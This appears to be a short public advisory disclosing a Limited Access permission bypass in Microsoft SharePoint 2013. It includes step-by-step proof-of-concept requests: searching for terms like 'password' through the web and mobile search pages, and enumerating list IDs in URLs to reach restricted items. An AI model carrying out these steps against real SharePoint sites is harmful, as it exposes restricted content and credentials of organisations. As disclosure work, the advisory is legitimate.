Microsoft SharePoint suffers from a Limited Access permission bypass vulnerability.
0295554bf43ae5430a02da73edf4cfd7vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass
This vulnerability was discovered by 'Behnam Vanda' January 07, 2018
======================
I. About Vulnerability
======================
A permission level bypass vulnerability has been identified in microsoft sharePoint 2013 & maybe prior. This vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass 'Limited Acces' permission to browse a site page or library to access a specific content item that was restricted.
======================
II. Exploit
======================
#POC 1 :
1. Search for specific words inside web & mobile sharepoint search box: "password" "pass" "user" "domain\user" "name | lastname" & etc
[~] web search : http://site/BSearch/results.aspx
[~] mobie search : http://site/_layouts/mobile/MobileResults.aspx
example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA\1377"
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB
2. The page shown some of sharepoint's search results like restricted specific item,site,library urls
3. so click at the urls to access|viwe|read site page and other restricted library and items
--------------------------------------
#POC 2 :
after capturing packets between our system and sharepoint site (use fiddler or brupsiute , wireshark , etc) We have access to items,list,pages,sites urls like as the following :
http://site/IT/Lists/List70/AllItems.aspx
so access to restricted items & lists by make /LIST#/ urls.
for example :
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx
======================
III. Affected Systems
Microsoft SharePoint 2013 & maybe prior
======================
----------------------
Behnam Vanda
[redhathackers]
E-Mail: beni[dot]vanda[at]gmail.com